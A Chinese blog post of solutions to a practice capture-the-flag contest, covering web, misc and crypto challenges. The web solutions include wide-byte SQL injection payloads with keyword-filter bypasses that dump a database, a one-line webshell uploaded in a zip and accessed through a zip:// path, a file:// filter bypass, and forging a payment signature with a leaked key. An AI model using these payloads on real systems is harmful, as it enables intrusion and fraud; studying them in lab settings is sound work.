ctf模拟赛题解

已于 2023-12-31 22:04:03 修改
阅读量1.1k 收藏 18
点赞数 22
文章标签: web安全 网络安全 安全
于 2023-12-25 23:41:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74924621/article/details/135185401
版权

Web

①我的生日

直接百度哆啦a梦的生日:2112年9月3日 21120903就是答案:

②input

查看页面源码:

发现flag就是str,那么只要打印str就知道flag了:

③刮刮乐 

根据提示一直刮卡,没中奖就刷新接着刮:

④ctf_judge 

尝试用手工sql注入:

⑤包罗万象 

 只允许上传类型中有zip类型,那么可以将一句话木马压缩成zip文件上传,用蚁剑连接

这里注意上传路径为http://10.14.3.103/index.php?url=zip:(文件路径)%23(后面接着木马文件名)

⑥php4fun 

 查看index.bak:发现file:///和php://被禁用

 但可以用?p=file://localhost/flag绕过:

⑦BabySqliv2.0 

题目提示了支持中文,就可以想到宽字节,登陆之后发现有一个显示位,可以通过联合查询得到flag

题目考点和过滤:
宽字节注入,过滤0x,union select where置空

# 显示database
name=1%df%27ununionion%20selselectect%201,char(97,100,109,105,110),database()%23&pw=1
# 得到数据库名为web_sqli

# 显示表名
name=1%df%27ununionion%20selselectect%201,char(97,100,109,105,110),group_concat(table_name)%20from%20information_schema.tables%20whwhereere%20table_schema=database()%23&pw=1
# 得到表名为f14g,user

# 显示f14g列名
name=1%df%27ununionion%20selselectect%201,char(97,100,109,105,110),group_concat(column_name)%20from%20information_schema.columns%20whwhereere%20table_name%20=%20char(102,49,52,103)%23&pw=1
# 得到f14g列名为b80bb7740288fda1f201890375a60c8f,327a6c4304ad5938eaf0efb6cc3e53dc

# 拿到flag
name=1%df%27ununionion%20selselectect%201,char(97,100,109,105,110),327a6c4304ad5938eaf0efb6cc3e53dc%20from%20f14g%20limit%2022,1%23&pw=1

 爆数据库:web_wqli

爆表名:f14g和user 

显示f14g列名:b80bb7740288fda1f201890375a60c8f,327a6c4304ad5938eaf0efb6cc3e53dc

 获取flag:R1hZe2cwT2Rfam9iMWltX3NvX3ZlZ2V0YWJsZX0=

这里还需要拿去给base64解码 :

 ⑧100块钱都不给我

一般网站都有robots.txt文件,手敲robots文件发现信息 :

打开这个PHP页面看一下:

$a = isset($_GET['ctf']) ? $_GET['ctf'] : '';

发现可控的变量,已经知道是PHP的程序,我们开始用变量构造页面,构造一个phpinfo吧
?ctf=phpinfo

找到flag:

⑨ shop

下载源码,发现提交源码:

@csrf_exempt
def checkPayment(request):
	# print(request.body)
	ret = {'result': '未知错误', 'status': 'danger'}
	sign = request.GET.get('signature', '')
	if md5(RANDOM_SECRET_KEY_FOR_PAYMENT_SIGNATURE + request.body).hexdigest() == sign:
		o = get_object_or_404(Order, id=request.POST.get('order_id'))
		g = get_object_or_404(Good, id=request.POST.get('good_id'))
		u = get_object_or_404(User, id=request.POST.get('buyer_id'))
		# 检查订单是否为待支付状态
		if o.status != Order.ONGOING:
			ret['result'] = f'订单 {o.id} 状态异常,可能已完成或已取消'
		# 检查商品是否可购买
		elif g.available != True or g.amount <= 0:
			ret['result'] = f'商品 {g.id} 暂时不可购买,可能库存不足'
		# 检查用户可用积分是否足够
		elif u.profile.point < g.price:
			ret['result'] = f'用户 {u.username} 可用积分不足,无法完成支付'
		else:
			if u.is_staff != True:
				u.profile.point -= g.price
				u.save()
			g.amount -= 1
			if g.name == 'FLAG':
				o.message = REAL_FLAG
			else:
				o.message = f'fake_flag{{{md5(urandom(32)).hexdigest()}}}<br>(购买“FLAG”才能获得真正的 flag)'
			if g.amount <= randint(0, 100):
				g.amount += randint(100, 200)
			g.save()
			o.status = Order.FINISHED
			o.save()
			ret['result'] = f'订单 {o.id} 支付成功!'
			ret['status'] = 'success'
	else:
		ret['result'] = '签名不正确,数据可能被篡改!'
	return render(request, 'payment/result.html', ret)

再查看数据库,找到管理员的积分是3w,所以是用管理员去购买flag 

secret.key中找到key=zhinianyuxin,即RANDOM_SECRET_KEY_FOR_PAYMENT_SIGNATURE=zhinianyuxin

先买一个flag用bp抓包

修改buyerid为16,然后用python输出管理员的签名:

 再将这个原来bp的签名修改为这个签名发送,就成功购买flag了:

MISC

① 大白

根据提示知道这张图片并不完整:

我们需要调这个图片的高度,首先要了解010Editor中各个区域 :

在winhex打开这张图片,将高度修改为与宽度相同 ,保存修改就找到flag了:

CRYPTO

直接拿去给base64解码就是flag:

别问我,我什么都不知道
关注
  • 22
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[GXYCTF2019] web题-BabySQli
BROTHERYY的博客
07-13 592
复现环境:buuoj.cn 查看页面源代码发现有个search.php,访问这个文件以后发现有base32编码 在网上对其解码后得到 在登录发现存在账号admin,使用联合查询 联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。这时候直接在pass框里面输入e10adc3949ba59abbe56e057f20f883e的md5解密结果就可以了。 flag{360b0328-2477-4a68-801b-4f3fed8217a0} ...
Buuctf web题 [GXYCTF2019]BabySQli WP
alatan9的博客
02-09 74
账号1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'尝试后发现select 1,2,3 1是账号 3是密码 2不知道是啥。发现一串密码由于多数的大写字母怀疑是base32 解密。我们可以利用union select来创建一个临时账号。需要工具的可以私聊我 技术问题也可以私聊。解密后发现是base64 再次解密。发现到4报错 说明数据库只有三列。应该是sql注入先爆破出账号。发现过滤order 尝试绕过。发现账号是admin。
ctf练习题
moon__________的博客
10-09 3495
攻防世界WEB-Challenge area -Web php include WEB-Challenge area -Web php include 代码审计可以轻松知道本题考查文件包含并且过滤的php:// 所以我们用data://伪协议来传输数据,成功执行phpinfo() http://111.200.241.244:59922/index.php?page=data://text/plain,<?php phpinfo();?> 接下来我们利用大小写测试服务器操作系统(其实上图已
CTF初学——攻防世界crypto新手练习区
m0_59207381的博客
08-04 1884
1. base64 题目描述:元宵节灯谜是一种古老的传统民间观灯猜谜的习俗。 因为谜语能启迪智慧又饶有兴趣,灯谜增添节日气氛,是一项很有趣的活动。 你也很喜欢这个游戏,这不,今年元宵节,心里有个黑客梦的你,约上你青梅竹马的好伙伴小鱼, 来到了cyberpeace的攻防世界猜谜大会,也想着一展身手。 你们一起来到了小孩子叽叽喳喳吵吵闹闹的地方,你俩抬头一看,上面的大红灯笼上写着一些奇奇怪怪的 字符串,小鱼正纳闷呢,你神秘一笑,我知道这是什么了。 解析: 根据题目可知这是一道base64解密加密的问题,直
网络安全最全100道CTF题目,收好了~(附答案)_ctf选择题(1),2024网络安全大厂面试经验
最新发布
2401_84300239的博客
05-09 595
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CTF题下载、复现、解题方法
renxq097的博客
04-07 3571
CTF题下载、复现、解题方法 看过这篇文章,你将学会自己搭建大佬们在github中分享的题进行复现 我们以靶场其中的(web_gift)进行复现 一、操作系统准备 你需要一个linux操作系统并完成docker搭建。 系统:ubuntu 安装网上教程一大堆,这里推荐一个: https://www.cnblogs.com/liujiaxin2018/p/14207930.html 二、ubuntu搭建docker环境 网上搭建docker一堆坑,对新手很不友好,建议看官网的最新命令 更
CTF题目合集
cgygsw的博客
01-26 2266
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
CTF题库超详细资源合集
06-14
在传统的CTF线上⽐中,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参者不需掌握系统底层知识;相较于密码学、杂项问题,不需具特别强的编程能⼒,故⼊门较为容易。Web类题⽬常见的漏洞类型...
CyBRICS CTF Quals 2019 Web 题解1
08-04
CyBRICS CTF Quals 2019 Web 题解一大堆字,直接查看final.html的源码,没什么发现然后把final.html删掉,发现index
CTF信息安全单项选择题.docx
01-25
CTF信息安全单项选择题.
CTF-Mobile-Tutorial:我写的一些Mobile CTF题解
03-28
CTF移动版 作者:wnagzihxa1n邮件: 作为一个CTF弱鸡,每次比除了湿敷们吊打,就是被湿敷们吊打 好在比的时候收集了过多的过渡,痛定思痛,努力学习,走向以后被湿敷们轻点吊打
CTF夺旗.pdf
11-16
CTF夺旗.pdf
CTF中的常见题型
11-13
CTF中的常见题型目录,给初学者提供学习方向。CTF(Capture The Flag)中文一般译作夺旗,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比形式。
CTF100题.docx
05-25
CTF是一种流行的信息安全形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗”。其大致流程是,参团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比环境中得到一串具有一定格式的字符...
canvas教程18-刮刮乐
William_fang的博客
08-02 282
文章目录一.刮刮乐二.效果图篇章 一.刮刮乐 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"&g
CTFWeb方向练习题)(持续更新)
m0_56010012的博客
02-23 5038
1.Training-WWW-Robots 打开应用场景,如下: 网址后面添加/robots.txt 查看其中内容(robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件),内容如下: 根据提示,访问/fl0g.php,得到flag值。 ...
超菜鸟级ctf
kid的博客
04-27 4680
超菜鸟级ctf 前言 大佬们为我这些菜鸟准备的ctf平台来练习(紧抱大佬的腿),特意为没打过ctf的我们准备了一些超级基础的题来开启我们的第一次ctf之旅… 一共只有6道题吧,一个半小时左右,真的是超简单,结果做的真的是… 下面凭我个人的感觉由简到难的回忆一遍吧 题目 抽屉没锁 这是一道文件上传题,也是我点开6道题后最先入手的 进到页面一看就很直接的会想文件上传漏洞,真的是第一次玩ctf,拿...
CTF-实验吧-安全杂项-社交网络
mynd天堂
03-07 2779
题目来源:http://www.shiyanbar.com/ctf/1879点击打开链接 下载压缩包,尝试解压无果,看文件名字猜想密码是生日,找一个生日字典用脚本自行爆破得: 解压后得到一张JPG图片,查看其属性发现答案: 其实这题一开始给了提示:”低音Neo“,找到其微博看其基本信息: 与解压的密码一致。 本博客仅记录一下自己
今年今日==我的生日
Z_Z.W's HOME
12-07 139
2009年12月6號  天氣晴  星期日     今天是我的生日,農曆十月二十,開心的一天,期盼的一天,因為有朋友的陪伴!     蝦米,回國了,來廣州看我,6號又趕到廣州給我過生日,7號就要走了,時間很緊,有些不捨,    很討厭這種分離的感覺,好似孤寂又回到了身上!     藍琪,也給我過生日,陽曆生日時就知道了,這種被記得的感覺真好!     還有兩個“可愛的”學弟,哈哈,不發表評論...
CTF reverse
12-25
CTF reverse(CTF逆向工程)是指在CTF中涉及到的逆向分析和破解技术。逆向工程是通过对软件进行反汇编、反编译等操作,来理解其内部结构和实现原理的过程。在CTF reverse中,参选手需要具备较强的逆向分析能力,能够通过逆向分析来猜测软件的功能和实现思路,并进行验证。 CTF reverse的主要目标是解决给定的逆向工程问题,例如破解密码、还原加密算法、分析恶意软件等。参选手需要使用逆向工程技术来分析和理解给定的程序或者二进制文件,找出其中隐藏的信息和漏洞,并利用这些信息来解决问题。 在CTF reverse中,常用的工具包括IDA Pro、OllyDbg、Ghidra等。参选手可以使用这些工具来进行反汇编、反编译、调试等操作,以便深入理解程序的运行机制和逻辑。 总结起来,CTF reverse是一项需要逆向分析能力的竞项目,参选手通过对软件进行逆向工程来解决给定的问题。这需要他们具备扎实的逆向分析技术和对计算机系统的深入理解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值